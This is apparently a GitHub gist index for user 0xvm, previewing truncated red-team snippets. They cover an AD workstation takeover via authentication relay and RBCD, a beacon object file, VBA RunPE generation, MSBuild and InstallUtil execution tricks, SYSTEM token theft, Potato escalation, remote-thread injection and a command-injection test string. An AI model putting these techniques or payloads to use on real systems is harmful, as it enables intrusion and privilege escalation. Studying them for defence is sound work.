0xvm’s gists

0xvm / Workstation-Takeover.md

Created March 7, 2024 21:57 — forked from gladiatx0r/Workstation-Takeover.md

From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

0xvm / check_vulnerabledrivers.ps1

Created May 21, 2023 12:06 — forked from api0cradle/check_vulnerabledrivers.ps1

A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io

	# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
	# Author: Oddvar Moe - @oddvar.moe

	$drivers = get-childitem -Path c:\windows\system32\drivers
	$web_client = new-object system.net.webclient
	$loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") \| ConvertFrom-Json

	Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
	foreach ($lol in $loldrivers.KnownVulnerableSamples)
	{

0xvm / COFF_With_Exception_handler.c

Created February 23, 2023 09:13 — forked from freefirex/COFF_With_Exception_handler.c

	#define _WIN32_WINNT 0x0502
	#define WINVER 0x0502
	#include <windows.h>
	#include <errhandlingapi.h>
	#include <process.h>
	#include "beacon.h"

	WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
	DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void _Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void _ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
	DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval);

0xvm / python3-gen-script

Last active April 28, 2022 14:03

vba-runpe-custom

	#pe2vba.py
	#!/usr/bin/env python3

	from subprocess import Popen, PIPE
	from os import system, remove
	import argparse
	import os.path

	MAX_PROC_SIZE = 32 # Nbr of lines per procedure
	MAX_LINE_SIZE = 32 # Nbr of bytes per line

0xvm / msbuild-mimi.csproj

Created April 6, 2021 18:48

msbuild and run an arbitrary executable

This file has been truncated, but you can view the full file.

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<PropertyGroup>
	<PlatformTarget>x64</PlatformTarget>
	</PropertyGroup>
	<UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs"><![CDATA[

0xvm / injection check

Created August 31, 2020 10:54

dddd",'|&$;:`({{@<%=ddd

0xvm / gethelp.cs

Created May 14, 2019 04:19

Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8

	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause

0xvm / getsystem_parent.cpp

Created January 22, 2019 23:59 — forked from xpn/getsystem_parent.cpp

A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

	#include "stdafx.h"

	BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

0xvm / invoke-potato.ps1

Created January 21, 2019 14:29

This file has been truncated, but you can view the full file.

	function Invoke-Potato
	{
	<#
	.SYNOPSIS

	Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load Rotten Potato DLL directly into memory. This
	allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders.

	The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe

0xvm / sedebug_rtlcreatethread.c

Created October 22, 2018 19:15

	/! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c /
	#include <windows.h>
	#include <stdio.h>

	typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
	HANDLE ProcessHandle,
	PSECURITY_DESCRIPTOR SecurityDescriptor,
	BOOL CreateSuspended,
	ULONG StackZeroBits,
	PULONG StackReserved,

0乂ᐯ爪 0xvm

Overview